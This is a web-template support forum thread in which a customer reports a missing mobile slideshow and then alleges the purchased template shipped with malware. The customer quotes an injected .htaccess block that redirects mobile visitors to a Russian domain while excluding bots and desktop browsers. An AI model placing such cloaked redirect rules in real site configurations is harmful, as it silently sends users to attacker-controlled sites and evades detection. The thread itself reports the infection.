HomePage Forums Templates Support LearnPro Slideshow not visible on mobile

Viewing 9 posts - 1 through 9 (of 9 total)
  • Author
    kweb
    Participant

Hi there,
    I have nearly finished my site with your template. I have chosen the standard image slideshow from sp page builder instead of the revolution slider. But something is blocking the slideshow to show up on mobile devices. When I check the site on desktop browser its all there – even when I resize the screen. But on mobile device its gone. Can you help me out?

Best regards,
    kweb

kweb
    Participant

Btw. Homepage 3 is the right one….

kweb
    Participant

Hello? Will I receive any support here? I need to finish the site this week before christmas.

I have tried everything – but its not working. The site is extremely slow under mobile devices even on Wifi – offcanvas without function and slideshow addons is not not showing up.

BTW: Your demo site over envato is not working on mobile either.

kweb

admin
    Keymaster

Hello,
    I did fix for you.
    Please check.
    Thanks!

kweb
    Participant

Ok its working right now – BUT:

I told my friend, who has a coding company to check the site: Now you must tell me what it has to do with that:

https://ibb.co/XjJpq0J

When I first downloaded your template it was full of malware and virus so that I get block from my provider. After that you send me another package (you said clean package) – and now I found out that its also infected – after 40 hours of work….

You know that I do this for companies and clients and that I get in real troubles when I open a site like this. When I redownload your package over evanto its still the infected package. Why do you offer something like that to your clients?

kweb

admin
    Keymaster

Hello,
    i use tool check malware in https://sitecheck.sucuri.net/results/paul-zimmermann-schule.de/neu/, i don’t find malware or security problem on your site.
    And how to i can see as screenshot?
    Thanks!

kweb
    Participant

Yes – you dont find anything anymore now because I have cleaned my whole website 3 hours ago. There have been several .htaccess files like this:

RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
    RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
    RewriteCond %{HTTP:Profile} .+ [NC,OR]
    RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
    RewriteCond %{QUERY_STRING} !noredirect [NC]
    RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
    RewriteRule ^(.*)$ http://wwwtype.ru [L,R=302]

Your template (quickstart) is pointing to a russian site when user uses mobile phones. You should fix this immediately – I have also contacted envato how it can be that someone who is paying money for templates can get infected by malware, if they dont have any protection against this.

Sorry to say – but Im not gonna buy any templates from you anymore for my projects.

kweb

Cesare77
    Participant

I have the same problem. Can you help me? I sent you a support request a month ago and you haven’t answered me yet
    Cesare

admin
    Keymaster

Hello, please give me information to email adobitheme@gmail.com. i will check and solve it.
    Thanks!

Viewing 9 posts - 1 through 9 (of 9 total)

You must be logged in to reply to this topic.